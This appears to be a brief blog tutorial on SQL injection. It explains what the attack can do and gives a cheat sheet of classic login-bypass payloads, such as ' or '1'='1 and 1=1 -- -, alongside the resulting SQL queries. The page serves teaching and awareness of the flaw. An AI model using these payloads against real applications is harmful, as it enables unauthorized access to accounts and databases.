SQL INJECTION

SQL Injection (SQLi) is an injection attack where an attacker executes malicious SQL statements to control a web application’s database server, thereby accessing, modifying and deleting unauthorized data.

What can SQL Injection do?
  • Bypass a web application’s authorization mechanisms and extract sensitive information
  • Easily control application behavior that’s based on data in the database
  • Inject further malicious code to be executed when users access the application
  • Add, modify and delete data, corrupting the database, and making the application or unusable
  • Enumerate the authentication details of a user registered on a website and use the data in attacks on other sites.
Cheat sheet
User namePasswordSQL Query
tomtomSELECT * FROM users
WHERE name='tom'
and password='tom'
tom' or '1'='1SELECT * FROM users
WHERE name='tom'
and password='' or '1'='1'
tom' or 1='1SELECT * FROM users
WHERE name='tom'
and password='' or 1='1'
tom1' or 1=1 -- -SELECT * FROM users
WHERE name='tom'
and password='' or 1=1-- -'
' or '1'='1' or '1'='1SELECT * FROM users
WHERE name='' or '1'='1'
and password='' or '1'='1'
' or ' 1=1' or ' 1=1SELECT * FROM users
WHERE name='' or ' 1=1'
and password='' or ' 1=1'
1' or 1=1 -- -blahSELECT * FROM users
WHERE name='1' or 1=1 -- -'
and password='blah'
PREVIOUS                                                                                                   NEXT

Comments

Post a Comment

If you want information about anything else, then tell me in your comment